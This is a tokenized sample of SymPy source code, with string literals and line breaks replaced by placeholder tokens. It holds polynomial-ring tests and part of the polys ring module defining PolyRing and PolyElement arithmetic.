( '<STR_LIT>' ) <EOL> f = lambdify ( [ x ] , x + <NUM_LIT:1> ) <EOL> assert f ( <NUM_LIT:1> ) == <NUM_LIT:2> <EOL> @ disable_print <EOL> def test_append_issue_7140 ( ) : <EOL> x = Symbol ( '<STR_LIT:x>' ) <EOL> p1 = plot ( x ) <EOL> p2 = plot ( x ** <NUM_LIT:2> ) <EOL> p3 = plot ( x + <NUM_LIT:2> ) <EOL> p2 . append ( p1 [ <NUM_LIT:0> ] ) <EOL> assert len ( p2 . _series ) == <NUM_LIT:2> <EOL> with raises ( TypeError ) : <EOL> p1 . append ( p2 ) <EOL> with raises ( TypeError ) : <EOL> p1 . append ( p2 . _series ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from sympy . utilities import public <EOL> @ public <EOL> class DomainElement ( object ) : <EOL> """<STR_LIT>""" <EOL> def parent ( self ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) </s>
<s> """<STR_LIT>""" <EOL> from sympy . polys . domains import QQ , ZZ <EOL> from sympy . polys . polyerrors import ExactQuotientFailed , CoercionFailed , NotReversible <EOL> from sympy . abc import x , y <EOL> from sympy . utilities . pytest import raises <EOL> def test_build_order ( ) : <EOL> R = QQ . old_poly_ring ( x , y , order = ( ( "<STR_LIT>" , x ) , ( "<STR_LIT>" , y ) ) ) <EOL> assert R . order ( ( <NUM_LIT:1> , <NUM_LIT:5> ) ) == ( ( <NUM_LIT:1> , ) , ( - <NUM_LIT:5> , ) ) <EOL> def test_globalring ( ) : <EOL> Qxy = QQ . old_frac_field ( x , y ) <EOL> R = QQ . old_poly_ring ( x , y ) <EOL> X = R . convert ( x ) <EOL> Y = R . convert ( y ) <EOL> assert x in R <EOL> assert <NUM_LIT:1> / x not in R <EOL> assert <NUM_LIT:1> / ( <NUM_LIT:1> + x ) not in R <EOL> assert Y in R <EOL> assert X . ring == R <EOL> assert X * ( Y ** <NUM_LIT:2> + <NUM_LIT:1> ) == R . convert ( x * ( y ** <NUM_LIT:2> + <NUM_LIT:1> ) ) <EOL> assert X * y == X * Y == R . convert ( x * y ) == x * Y <EOL> assert X + y == X + Y == R . convert ( x + y ) == x + Y <EOL> assert X - y == X - Y == R . convert ( x - y ) == x - Y <EOL> assert X + <NUM_LIT:1> == R . convert ( x + <NUM_LIT:1> ) <EOL> raises ( ExactQuotientFailed , lambda : X / Y ) <EOL> raises ( ExactQuotientFailed , lambda : x / Y ) <EOL> raises ( ExactQuotientFailed , lambda : X / y ) <EOL> assert X ** <NUM_LIT:2> / X == X <EOL> assert R . from_GlobalPolynomialRing ( ZZ . old_poly_ring ( x , y ) . convert ( x ) , ZZ . old_poly_ring ( x , y ) ) == X <EOL> assert R . from_FractionField ( Qxy . convert ( x ) , Qxy ) == X <EOL> assert R . from_FractionField ( Qxy . convert ( x ) / y , Qxy ) is None <EOL> assert R . _sdm_to_vector ( R . _vector_to_sdm ( [ X , Y ] , R . order ) , <NUM_LIT:2> ) == [ X , Y ] <EOL> def test_localring ( ) : <EOL> Qxy = QQ . old_frac_field ( x , y ) <EOL> R = QQ . old_poly_ring ( x , y , order = "<STR_LIT>" ) <EOL> X = R . convert ( x ) <EOL> Y = R . 
convert ( y ) <EOL> assert x in R <EOL> assert <NUM_LIT:1> / x not in R <EOL> assert <NUM_LIT:1> / ( <NUM_LIT:1> + x ) in R <EOL> assert Y in R <EOL> assert X . ring == R <EOL> assert X * ( Y ** <NUM_LIT:2> + <NUM_LIT:1> ) / ( <NUM_LIT:1> + X ) == R . convert ( x * ( y ** <NUM_LIT:2> + <NUM_LIT:1> ) / ( <NUM_LIT:1> + x ) ) <EOL> assert X * y == X * Y <EOL> raises ( ExactQuotientFailed , lambda : X / Y ) <EOL> raises ( ExactQuotientFailed , lambda : x / Y ) <EOL> raises ( ExactQuotientFailed , lambda : X / y ) <EOL> assert X + y == X + Y == R . convert ( x + y ) == x + Y <EOL> assert X - y == X - Y == R . convert ( x - y ) == x - Y <EOL> assert X + <NUM_LIT:1> == R . convert ( x + <NUM_LIT:1> ) <EOL> assert X ** <NUM_LIT:2> / X == X <EOL> assert R . from_GlobalPolynomialRing ( ZZ . old_poly_ring ( x , y ) . convert ( x ) , ZZ . old_poly_ring ( x , y ) ) == X <EOL> assert R . from_FractionField ( Qxy . convert ( x ) , Qxy ) == X <EOL> raises ( CoercionFailed , lambda : R . from_FractionField ( Qxy . convert ( x ) / y , Qxy ) ) <EOL> raises ( ExactQuotientFailed , lambda : X / Y ) <EOL> raises ( NotReversible , lambda : X . invert ( ) ) <EOL> assert R . _sdm_to_vector ( <EOL> R . _vector_to_sdm ( [ X / ( X + <NUM_LIT:1> ) , Y / ( <NUM_LIT:1> + X * Y ) ] , R . order ) , <NUM_LIT:2> ) == [ X * ( <NUM_LIT:1> + X * Y ) , Y * ( <NUM_LIT:1> + X ) ] <EOL> def test_conversion ( ) : <EOL> L = QQ . old_poly_ring ( x , y , order = "<STR_LIT>" ) <EOL> G = QQ . old_poly_ring ( x , y ) <EOL> assert L . convert ( x ) == L . convert ( G . convert ( x ) , G ) <EOL> assert G . convert ( x ) == G . convert ( L . convert ( x ) , L ) <EOL> raises ( CoercionFailed , lambda : G . convert ( L . convert ( <NUM_LIT:1> / ( <NUM_LIT:1> + x ) ) , L ) ) <EOL> def test_units ( ) : <EOL> R = QQ . old_poly_ring ( x ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> ) ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:2> ) ) <EOL> assert not R . is_unit ( R . convert ( x ) ) <EOL> assert not R . 
is_unit ( R . convert ( <NUM_LIT:1> + x ) ) <EOL> R = QQ . old_poly_ring ( x , order = '<STR_LIT>' ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> ) ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:2> ) ) <EOL> assert not R . is_unit ( R . convert ( x ) ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> + x ) ) <EOL> R = ZZ . old_poly_ring ( x ) <EOL> assert R . is_unit ( R . convert ( <NUM_LIT:1> ) ) <EOL> assert not R . is_unit ( R . convert ( <NUM_LIT:2> ) ) <EOL> assert not R . is_unit ( R . convert ( x ) ) <EOL> assert not R . is_unit ( R . convert ( <NUM_LIT:1> + x ) ) </s>
<s> """<STR_LIT>""" <EOL> from __future__ import print_function , division <EOL> from operator import add , mul , lt , le , gt , ge <EOL> from types import GeneratorType <EOL> from sympy . core . expr import Expr <EOL> from sympy . core . symbol import Symbol , symbols as _symbols <EOL> from sympy . core . numbers import igcd , oo <EOL> from sympy . core . sympify import CantSympify , sympify <EOL> from sympy . core . compatibility import is_sequence , reduce , string_types , range <EOL> from sympy . ntheory . multinomial import multinomial_coefficients <EOL> from sympy . polys . monomials import MonomialOps <EOL> from sympy . polys . orderings import lex <EOL> from sympy . polys . heuristicgcd import heugcd <EOL> from sympy . polys . compatibility import IPolys <EOL> from sympy . polys . polyutils import expr_from_dict , _dict_reorder , _parallel_dict_from_expr <EOL> from sympy . polys . polyerrors import CoercionFailed , GeneratorsError , GeneratorsNeeded , ExactQuotientFailed , MultivariatePolynomialError <EOL> from sympy . polys . domains . domainelement import DomainElement <EOL> from sympy . polys . domains . polynomialring import PolynomialRing <EOL> from sympy . polys . polyoptions import Domain as DomainOpt , Order as OrderOpt , build_options <EOL> from sympy . polys . densebasic import dmp_to_dict , dmp_from_dict <EOL> from sympy . polys . constructor import construct_domain <EOL> from sympy . printing . defaults import DefaultPrinting <EOL> from sympy . utilities import public <EOL> from sympy . utilities . magic import pollute <EOL> @ public <EOL> def ring ( symbols , domain , order = lex ) : <EOL> """<STR_LIT>""" <EOL> _ring = PolyRing ( symbols , domain , order ) <EOL> return ( _ring , ) + _ring . gens <EOL> @ public <EOL> def xring ( symbols , domain , order = lex ) : <EOL> """<STR_LIT>""" <EOL> _ring = PolyRing ( symbols , domain , order ) <EOL> return ( _ring , _ring . 
gens ) <EOL> @ public <EOL> def vring ( symbols , domain , order = lex ) : <EOL> """<STR_LIT>""" <EOL> _ring = PolyRing ( symbols , domain , order ) <EOL> pollute ( [ sym . name for sym in _ring . symbols ] , _ring . gens ) <EOL> return _ring <EOL> @ public <EOL> def sring ( exprs , * symbols , ** options ) : <EOL> """<STR_LIT>""" <EOL> single = False <EOL> if not is_sequence ( exprs ) : <EOL> exprs , single = [ exprs ] , True <EOL> exprs = list ( map ( sympify , exprs ) ) <EOL> opt = build_options ( symbols , options ) <EOL> reps , opt = _parallel_dict_from_expr ( exprs , opt ) <EOL> if opt . domain is None : <EOL> coeffs = sum ( [ list ( rep . values ( ) ) for rep in reps ] , [ ] ) <EOL> opt . domain , _ = construct_domain ( coeffs , opt = opt ) <EOL> _ring = PolyRing ( opt . gens , opt . domain , opt . order ) <EOL> polys = list ( map ( _ring . from_dict , reps ) ) <EOL> if single : <EOL> return ( _ring , polys [ <NUM_LIT:0> ] ) <EOL> else : <EOL> return ( _ring , polys ) <EOL> def _parse_symbols ( symbols ) : <EOL> if not symbols : <EOL> raise GeneratorsNeeded ( "<STR_LIT>" ) <EOL> if isinstance ( symbols , string_types ) : <EOL> return _symbols ( symbols , seq = True ) <EOL> elif isinstance ( symbols , Expr ) : <EOL> return ( symbols , ) <EOL> elif is_sequence ( symbols ) : <EOL> if all ( isinstance ( s , string_types ) for s in symbols ) : <EOL> return _symbols ( symbols ) <EOL> elif all ( isinstance ( s , Expr ) for s in symbols ) : <EOL> return symbols <EOL> raise GeneratorsError ( "<STR_LIT>" ) <EOL> _ring_cache = { } <EOL> class PolyRing ( DefaultPrinting , IPolys ) : <EOL> """<STR_LIT>""" <EOL> def __new__ ( cls , symbols , domain , order = lex ) : <EOL> symbols = tuple ( _parse_symbols ( symbols ) ) <EOL> ngens = len ( symbols ) <EOL> domain = DomainOpt . preprocess ( domain ) <EOL> order = OrderOpt . preprocess ( order ) <EOL> _hash = hash ( ( cls . __name__ , symbols , ngens , domain , order ) ) <EOL> obj = _ring_cache . 
get ( _hash ) <EOL> if obj is None : <EOL> if domain . is_Composite and set ( symbols ) & set ( domain . symbols ) : <EOL> raise GeneratorsError ( "<STR_LIT>" ) <EOL> obj = object . __new__ ( cls ) <EOL> obj . _hash = _hash <EOL> obj . dtype = type ( "<STR_LIT>" , ( PolyElement , ) , { "<STR_LIT>" : obj } ) <EOL> obj . symbols = symbols <EOL> obj . ngens = ngens <EOL> obj . domain = domain <EOL> obj . order = order <EOL> obj . zero_monom = ( <NUM_LIT:0> , ) * ngens <EOL> obj . gens = obj . _gens ( ) <EOL> obj . _gens_set = set ( obj . gens ) <EOL> obj . _one = [ ( obj . zero_monom , domain . one ) ] <EOL> codegen = MonomialOps ( ngens ) <EOL> obj . monomial_mul = codegen . mul ( ) <EOL> obj . monomial_pow = codegen . pow ( ) <EOL> obj . monomial_mulpow = codegen . mulpow ( ) <EOL> obj . monomial_ldiv = codegen . ldiv ( ) <EOL> obj . monomial_div = codegen . div ( ) <EOL> obj . monomial_lcm = codegen . lcm ( ) <EOL> obj . monomial_gcd = codegen . gcd ( ) <EOL> if order is lex : <EOL> obj . leading_expv = lambda f : max ( f ) <EOL> else : <EOL> obj . leading_expv = lambda f : max ( f , key = order ) <EOL> for symbol , generator in zip ( obj . symbols , obj . gens ) : <EOL> if isinstance ( symbol , Symbol ) : <EOL> name = symbol . name <EOL> if not hasattr ( obj , name ) : <EOL> setattr ( obj , name , generator ) <EOL> _ring_cache [ _hash ] = obj <EOL> return obj <EOL> def _gens ( self ) : <EOL> """<STR_LIT>""" <EOL> one = self . domain . one <EOL> _gens = [ ] <EOL> for i in range ( self . ngens ) : <EOL> expv = self . monomial_basis ( i ) <EOL> poly = self . zero <EOL> poly [ expv ] = one <EOL> _gens . append ( poly ) <EOL> return tuple ( _gens ) <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . symbols , self . domain , self . order ) <EOL> def __getstate__ ( self ) : <EOL> state = self . __dict__ . copy ( ) <EOL> del state [ "<STR_LIT>" ] <EOL> for key , value in state . items ( ) : <EOL> if key . 
startswith ( "<STR_LIT>" ) : <EOL> del state [ key ] <EOL> return state <EOL> def __hash__ ( self ) : <EOL> return self . _hash <EOL> def __eq__ ( self , other ) : <EOL> return self is other <EOL> def __ne__ ( self , other ) : <EOL> return self is not other <EOL> def clone ( self , symbols = None , domain = None , order = None ) : <EOL> return self . __class__ ( symbols or self . symbols , domain or self . domain , order or self . order ) <EOL> def monomial_basis ( self , i ) : <EOL> """<STR_LIT>""" <EOL> basis = [ <NUM_LIT:0> ] * self . ngens <EOL> basis [ i ] = <NUM_LIT:1> <EOL> return tuple ( basis ) <EOL> @ property <EOL> def zero ( self ) : <EOL> return self . dtype ( ) <EOL> @ property <EOL> def one ( self ) : <EOL> return self . dtype ( self . _one ) <EOL> def domain_new ( self , element , orig_domain = None ) : <EOL> return self . domain . convert ( element , orig_domain ) <EOL> def ground_new ( self , coeff ) : <EOL> return self . term_new ( self . zero_monom , coeff ) <EOL> def term_new ( self , monom , coeff ) : <EOL> coeff = self . domain_new ( coeff ) <EOL> poly = self . zero <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def ring_new ( self , element ) : <EOL> if isinstance ( element , PolyElement ) : <EOL> if self == element . ring : <EOL> return element <EOL> elif isinstance ( self . domain , PolynomialRing ) and self . domain . ring == element . ring : <EOL> return self . ground_new ( element ) <EOL> else : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> elif isinstance ( element , string_types ) : <EOL> raise NotImplementedError ( "<STR_LIT>" ) <EOL> elif isinstance ( element , dict ) : <EOL> return self . from_dict ( element ) <EOL> elif isinstance ( element , list ) : <EOL> try : <EOL> return self . from_terms ( element ) <EOL> except ValueError : <EOL> return self . from_list ( element ) <EOL> elif isinstance ( element , Expr ) : <EOL> return self . from_expr ( element ) <EOL> else : <EOL> return self . 
ground_new ( element ) <EOL> __call__ = ring_new <EOL> def from_dict ( self , element ) : <EOL> domain_new = self . domain_new <EOL> poly = self . zero <EOL> for monom , coeff in element . items ( ) : <EOL> coeff = domain_new ( coeff ) <EOL> if coeff : <EOL> poly [ monom ] = coeff <EOL> return poly <EOL> def from_terms ( self , element ) : <EOL> return self . from_dict ( dict ( element ) ) <EOL> def from_list ( self , element ) : <EOL> return self . from_dict ( dmp_to_dict ( element , self . ngens - <NUM_LIT:1> , self . domain ) ) <EOL> def _rebuild_expr ( self , expr , mapping ) : <EOL> domain = self . domain <EOL> def _rebuild ( expr ) : <EOL> generator = mapping . get ( expr ) <EOL> if generator is not None : <EOL> return generator <EOL> elif expr . is_Add : <EOL> return reduce ( add , list ( map ( _rebuild , expr . args ) ) ) <EOL> elif expr . is_Mul : <EOL> return reduce ( mul , list ( map ( _rebuild , expr . args ) ) ) <EOL> elif expr . is_Pow and expr . exp . is_Integer and expr . exp >= <NUM_LIT:0> : <EOL> return _rebuild ( expr . base ) ** int ( expr . exp ) <EOL> else : <EOL> return domain . convert ( expr ) <EOL> return _rebuild ( sympify ( expr ) ) <EOL> def from_expr ( self , expr ) : <EOL> mapping = dict ( list ( zip ( self . symbols , self . gens ) ) ) <EOL> try : <EOL> poly = self . _rebuild_expr ( expr , mapping ) <EOL> except CoercionFailed : <EOL> raise ValueError ( "<STR_LIT>" % ( self , expr ) ) <EOL> else : <EOL> return self . ring_new ( poly ) <EOL> def index ( self , gen ) : <EOL> """<STR_LIT>""" <EOL> if gen is None : <EOL> i = <NUM_LIT:0> <EOL> elif isinstance ( gen , int ) : <EOL> i = gen <EOL> if <NUM_LIT:0> <= i and i < self . ngens : <EOL> pass <EOL> elif - self . ngens <= i and i <= - <NUM_LIT:1> : <EOL> i = - i - <NUM_LIT:1> <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> elif isinstance ( gen , self . dtype ) : <EOL> try : <EOL> i = self . gens . 
index ( gen ) <EOL> except ValueError : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> elif isinstance ( gen , string_types ) : <EOL> try : <EOL> i = self . symbols . index ( gen ) <EOL> except ValueError : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> return i <EOL> def drop ( self , * gens ) : <EOL> """<STR_LIT>""" <EOL> indices = set ( map ( self . index , gens ) ) <EOL> symbols = [ s for i , s in enumerate ( self . symbols ) if i not in indices ] <EOL> if not symbols : <EOL> return self . domain <EOL> else : <EOL> return self . clone ( symbols = symbols ) <EOL> def __getitem__ ( self , key ) : <EOL> symbols = self . symbols [ key ] <EOL> if not symbols : <EOL> return self . domain <EOL> else : <EOL> return self . clone ( symbols = symbols ) <EOL> def to_ground ( self ) : <EOL> if self . domain . is_Composite or hasattr ( self . domain , '<STR_LIT>' ) : <EOL> return self . clone ( domain = self . domain . domain ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % self . domain ) <EOL> def to_domain ( self ) : <EOL> return PolynomialRing ( self ) <EOL> def to_field ( self ) : <EOL> from sympy . polys . fields import FracField <EOL> return FracField ( self . symbols , self . domain , self . order ) <EOL> @ property <EOL> def is_univariate ( self ) : <EOL> return len ( self . gens ) == <NUM_LIT:1> <EOL> @ property <EOL> def is_multivariate ( self ) : <EOL> return len ( self . gens ) > <NUM_LIT:1> <EOL> def add ( self , * objs ) : <EOL> """<STR_LIT>""" <EOL> p = self . zero <EOL> for obj in objs : <EOL> if is_sequence ( obj , include = GeneratorType ) : <EOL> p += self . add ( * obj ) <EOL> else : <EOL> p += obj <EOL> return p <EOL> def mul ( self , * objs ) : <EOL> """<STR_LIT>""" <EOL> p = self . one <EOL> for obj in objs : <EOL> if is_sequence ( obj , include = GeneratorType ) : <EOL> p *= self . 
mul ( * obj ) <EOL> else : <EOL> p *= obj <EOL> return p <EOL> def drop_to_ground ( self , * gens ) : <EOL> r"""<STR_LIT>""" <EOL> indices = set ( map ( self . index , gens ) ) <EOL> symbols = [ s for i , s in enumerate ( self . symbols ) if i not in indices ] <EOL> gens = [ gen for i , gen in enumerate ( self . gens ) if i not in indices ] <EOL> if not symbols : <EOL> return self <EOL> else : <EOL> return self . clone ( symbols = symbols , domain = self . drop ( * gens ) ) <EOL> def compose ( self , other ) : <EOL> """<STR_LIT>""" <EOL> if self != other : <EOL> syms = set ( self . symbols ) . union ( set ( other . symbols ) ) <EOL> return self . clone ( symbols = list ( syms ) ) <EOL> else : <EOL> return self <EOL> def add_gens ( self , symbols ) : <EOL> """<STR_LIT>""" <EOL> syms = set ( self . symbols ) . union ( set ( symbols ) ) <EOL> return self . clone ( symbols = list ( syms ) ) <EOL> class PolyElement ( DomainElement , DefaultPrinting , CantSympify , dict ) : <EOL> """<STR_LIT>""" <EOL> def new ( self , init ) : <EOL> return self . __class__ ( init ) <EOL> def parent ( self ) : <EOL> return self . ring . to_domain ( ) <EOL> def __getnewargs__ ( self ) : <EOL> return ( self . ring , list ( self . iterterms ( ) ) ) <EOL> _hash = None <EOL> def __hash__ ( self ) : <EOL> _hash = self . _hash <EOL> if _hash is None : <EOL> self . _hash = _hash = hash ( ( self . ring , frozenset ( self . items ( ) ) ) ) <EOL> return _hash <EOL> def copy ( self ) : <EOL> """<STR_LIT>""" <EOL> return self . new ( self ) <EOL> def set_ring ( self , new_ring ) : <EOL> if self . ring == new_ring : <EOL> return self <EOL> elif self . ring . symbols != new_ring . symbols : <EOL> terms = list ( zip ( * _dict_reorder ( self , self . ring . symbols , new_ring . symbols ) ) ) <EOL> return new_ring . from_terms ( terms ) <EOL> else : <EOL> return new_ring . from_dict ( self ) <EOL> def as_expr ( self , * symbols ) : <EOL> if symbols and len ( symbols ) != self . ring . 
ngens : <EOL> raise ValueError ( "<STR_LIT>" % ( self . ring . ngens , len ( symbols ) ) ) <EOL> else : <EOL> symbols = self . ring . symbols <EOL> return expr_from_dict ( self . as_expr_dict ( ) , * symbols ) <EOL> def as_expr_dict ( self ) : <EOL> to_sympy = self . ring . domain . to_sympy <EOL> return { monom : to_sympy ( coeff ) for monom , coeff in self . iterterms ( ) } <EOL> def clear_denoms ( self ) : <EOL> domain = self . ring . domain <EOL> if not domain . has_Field or not domain . has_assoc_Ring : <EOL> return domain . one , self <EOL> ground_ring = domain . get_ring ( ) <EOL> common = ground_ring . one <EOL> lcm = ground_ring . lcm <EOL> denom = domain . denom <EOL> for coeff in self . values ( ) : <EOL> common = lcm ( common , denom ( coeff ) ) <EOL> poly = self . new ( [ ( k , v * common ) for k , v in self . items ( ) ] ) <EOL> return common , poly <EOL> def strip_zero ( self ) : <EOL> """<STR_LIT>""" <EOL> for k , v in list ( self . items ( ) ) : <EOL> if not v : <EOL> del self [ k ] <EOL> def __eq__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> if not p2 : <EOL> return not p1 <EOL> elif isinstance ( p2 , p1 . ring . dtype ) : <EOL> return dict . __eq__ ( p1 , p2 ) <EOL> elif len ( p1 ) > <NUM_LIT:1> : <EOL> return False <EOL> else : <EOL> return p1 . get ( p1 . ring . zero_monom ) == p2 <EOL> def __ne__ ( p1 , p2 ) : <EOL> return not p1 . __eq__ ( p2 ) <EOL> def almosteq ( p1 , p2 , tolerance = None ) : <EOL> """<STR_LIT>""" <EOL> ring = p1 . ring <EOL> if isinstance ( p2 , ring . dtype ) : <EOL> if set ( p1 . keys ( ) ) != set ( p2 . keys ( ) ) : <EOL> return False <EOL> almosteq = ring . domain . almosteq <EOL> for k in p1 . keys ( ) : <EOL> if not almosteq ( p1 [ k ] , p2 [ k ] , tolerance ) : <EOL> return False <EOL> else : <EOL> return True <EOL> elif len ( p1 ) > <NUM_LIT:1> : <EOL> return False <EOL> else : <EOL> try : <EOL> p2 = ring . domain . convert ( p2 ) <EOL> except CoercionFailed : <EOL> return False <EOL> else : <EOL> return ring . 
domain . almosteq ( p1 . const ( ) , p2 , tolerance ) <EOL> def sort_key ( self ) : <EOL> return ( len ( self ) , self . terms ( ) ) <EOL> def _cmp ( p1 , p2 , op ) : <EOL> if isinstance ( p2 , p1 . ring . dtype ) : <EOL> return op ( p1 . sort_key ( ) , p2 . sort_key ( ) ) <EOL> else : <EOL> return NotImplemented <EOL> def __lt__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , lt ) <EOL> def __le__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , le ) <EOL> def __gt__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , gt ) <EOL> def __ge__ ( p1 , p2 ) : <EOL> return p1 . _cmp ( p2 , ge ) <EOL> def _drop ( self , gen ) : <EOL> ring = self . ring <EOL> i = ring . index ( gen ) <EOL> if ring . ngens == <NUM_LIT:1> : <EOL> return i , ring . domain <EOL> else : <EOL> symbols = list ( ring . symbols ) <EOL> del symbols [ i ] <EOL> return i , ring . clone ( symbols = symbols ) <EOL> def drop ( self , gen ) : <EOL> i , ring = self . _drop ( gen ) <EOL> if self . ring . ngens == <NUM_LIT:1> : <EOL> if self . is_ground : <EOL> return self . coeff ( <NUM_LIT:1> ) <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> else : <EOL> poly = ring . zero <EOL> for k , v in self . items ( ) : <EOL> if k [ i ] == <NUM_LIT:0> : <EOL> K = list ( k ) <EOL> del K [ i ] <EOL> poly [ tuple ( K ) ] = v <EOL> else : <EOL> raise ValueError ( "<STR_LIT>" % gen ) <EOL> return poly <EOL> def _drop_to_ground ( self , gen ) : <EOL> ring = self . ring <EOL> i = ring . index ( gen ) <EOL> symbols = list ( ring . symbols ) <EOL> del symbols [ i ] <EOL> return i , ring . clone ( symbols = symbols , domain = ring [ i ] ) <EOL> def drop_to_ground ( self , gen ) : <EOL> if self . ring . ngens == <NUM_LIT:1> : <EOL> raise ValueError ( "<STR_LIT>" ) <EOL> i , ring = self . _drop_to_ground ( gen ) <EOL> poly = ring . zero <EOL> gen = ring . domain . gens [ <NUM_LIT:0> ] <EOL> for monom , coeff in self . 
iterterms ( ) : <EOL> mon = monom [ : i ] + monom [ i + <NUM_LIT:1> : ] <EOL> if not mon in poly : <EOL> poly [ mon ] = ( gen ** monom [ i ] ) . mul_ground ( coeff ) <EOL> else : <EOL> poly [ mon ] += ( gen ** monom [ i ] ) . mul_ground ( coeff ) <EOL> return poly <EOL> def to_dense ( self ) : <EOL> return dmp_from_dict ( self , self . ring . ngens - <NUM_LIT:1> , self . ring . domain ) <EOL> def to_dict ( self ) : <EOL> return dict ( self ) <EOL> def str ( self , printer , precedence , exp_pattern , mul_symbol ) : <EOL> if not self : <EOL> return printer . _print ( self . ring . domain . zero ) <EOL> prec_add = precedence [ "<STR_LIT>" ] <EOL> prec_mul = precedence [ "<STR_LIT>" ] <EOL> prec_atom = precedence [ "<STR_LIT>" ] <EOL> ring = self . ring <EOL> symbols = ring . symbols <EOL> ngens = ring . ngens <EOL> zm = ring . zero_monom <EOL> sexpvs = [ ] <EOL> for expv , coeff in self . terms ( ) : <EOL> positive = ring . domain . is_positive ( coeff ) <EOL> sign = "<STR_LIT>" if positive else "<STR_LIT>" <EOL> sexpvs . append ( sign ) <EOL> if expv == zm : <EOL> scoeff = printer . _print ( coeff ) <EOL> if scoeff . startswith ( "<STR_LIT:->" ) : <EOL> scoeff = scoeff [ <NUM_LIT:1> : ] <EOL> else : <EOL> if not positive : <EOL> coeff = - coeff <EOL> if coeff != <NUM_LIT:1> : <EOL> scoeff = printer . parenthesize ( coeff , prec_mul , strict = True ) <EOL> else : <EOL> scoeff = '<STR_LIT>' <EOL> sexpv = [ ] <EOL> for i in range ( ngens ) : <EOL> exp = expv [ i ] <EOL> if not exp : <EOL> continue <EOL> symbol = printer . parenthesize ( symbols [ i ] , prec_atom , strict = True ) <EOL> if exp != <NUM_LIT:1> : <EOL> if exp != int ( exp ) or exp < <NUM_LIT:0> : <EOL> sexp = printer . parenthesize ( exp , prec_atom , strict = False ) <EOL> else : <EOL> sexp = exp <EOL> sexpv . append ( exp_pattern % ( symbol , sexp ) ) <EOL> else : <EOL> sexpv . append ( '<STR_LIT:%s>' % symbol ) <EOL> if scoeff : <EOL> sexpv = [ scoeff ] + sexpv <EOL> sexpvs . append ( mul_symbol . 
join ( sexpv ) ) <EOL> if sexpvs [ <NUM_LIT:0> ] in [ "<STR_LIT>" , "<STR_LIT>" ] : <EOL> head = sexpvs . pop ( <NUM_LIT:0> ) <EOL> if head == "<STR_LIT>" : <EOL> sexpvs . insert ( <NUM_LIT:0> , "<STR_LIT:->" ) <EOL> return "<STR_LIT>" . join ( sexpvs ) <EOL> @ property <EOL> def is_generator ( self ) : <EOL> return self in self . ring . _gens_set <EOL> @ property <EOL> def is_ground ( self ) : <EOL> return not self or ( len ( self ) == <NUM_LIT:1> and self . ring . zero_monom in self ) <EOL> @ property <EOL> def is_monomial ( self ) : <EOL> return not self or ( len ( self ) == <NUM_LIT:1> and self . LC == <NUM_LIT:1> ) <EOL> @ property <EOL> def is_term ( self ) : <EOL> return len ( self ) <= <NUM_LIT:1> <EOL> @ property <EOL> def is_negative ( self ) : <EOL> return self . ring . domain . is_negative ( self . LC ) <EOL> @ property <EOL> def is_positive ( self ) : <EOL> return self . ring . domain . is_positive ( self . LC ) <EOL> @ property <EOL> def is_nonnegative ( self ) : <EOL> return self . ring . domain . is_nonnegative ( self . LC ) <EOL> @ property <EOL> def is_nonpositive ( self ) : <EOL> return self . ring . domain . is_nonpositive ( self . LC ) <EOL> @ property <EOL> def is_zero ( f ) : <EOL> return not f <EOL> @ property <EOL> def is_one ( f ) : <EOL> return f == f . ring . one <EOL> @ property <EOL> def is_monic ( f ) : <EOL> return f . ring . domain . is_one ( f . LC ) <EOL> @ property <EOL> def is_primitive ( f ) : <EOL> return f . ring . domain . is_one ( f . content ( ) ) <EOL> @ property <EOL> def is_linear ( f ) : <EOL> return all ( sum ( monom ) <= <NUM_LIT:1> for monom in f . itermonoms ( ) ) <EOL> @ property <EOL> def is_quadratic ( f ) : <EOL> return all ( sum ( monom ) <= <NUM_LIT:2> for monom in f . itermonoms ( ) ) <EOL> @ property <EOL> def is_squarefree ( f ) : <EOL> return f . ring . dmp_sqf_p ( f ) <EOL> @ property <EOL> def is_irreducible ( f ) : <EOL> return f . ring . 
dmp_irreducible_p ( f ) <EOL> @ property <EOL> def is_cyclotomic ( f ) : <EOL> if f . ring . is_univariate : <EOL> return f . ring . dup_cyclotomic_p ( f ) <EOL> else : <EOL> raise MultivariatePolynomialError ( "<STR_LIT>" ) <EOL> def __neg__ ( self ) : <EOL> return self . new ( [ ( monom , - coeff ) for monom , coeff in self . iterterms ( ) ] ) <EOL> def __pos__ ( self ) : <EOL> return self <EOL> def __add__ ( p1 , p2 ) : <EOL> """<STR_LIT>""" <EOL> if not p2 : <EOL> return p1 . copy ( ) <EOL> ring = p1 . ring <EOL> if isinstance ( p2 , ring . dtype ) : <EOL> p = p1 . copy ( ) <EOL> get = p . get <EOL> zero = ring . domain . zero <EOL> for k , v in p2 . items ( ) : <EOL> v = get ( k , zero ) + v <EOL> if v : <EOL> p [ k ] = v <EOL> else : <EOL> del p [ k ] <EOL> return p <EOL> elif isinstance ( p2 , PolyElement ) : <EOL> if isinstance ( ring . domain , PolynomialRing ) and ring . domain . ring == p2 . ring : <EOL> pass <EOL> elif isinstance ( p2 . ring . domain , PolynomialRing ) and p2 . ring . domain . ring == ring : <EOL> return p2 . __radd__ ( p1 ) <EOL> else : <EOL> return NotImplemented <EOL> try : <EOL> cp2 = ring . domain_new ( p2 ) <EOL> except CoercionFailed : <EOL> return NotImplemented <EOL> else : <EOL> p = p1 . copy ( ) <EOL> if not cp2 : <EOL> return p <EOL> zm = ring . zero_monom <EOL> if zm not in p1 . keys 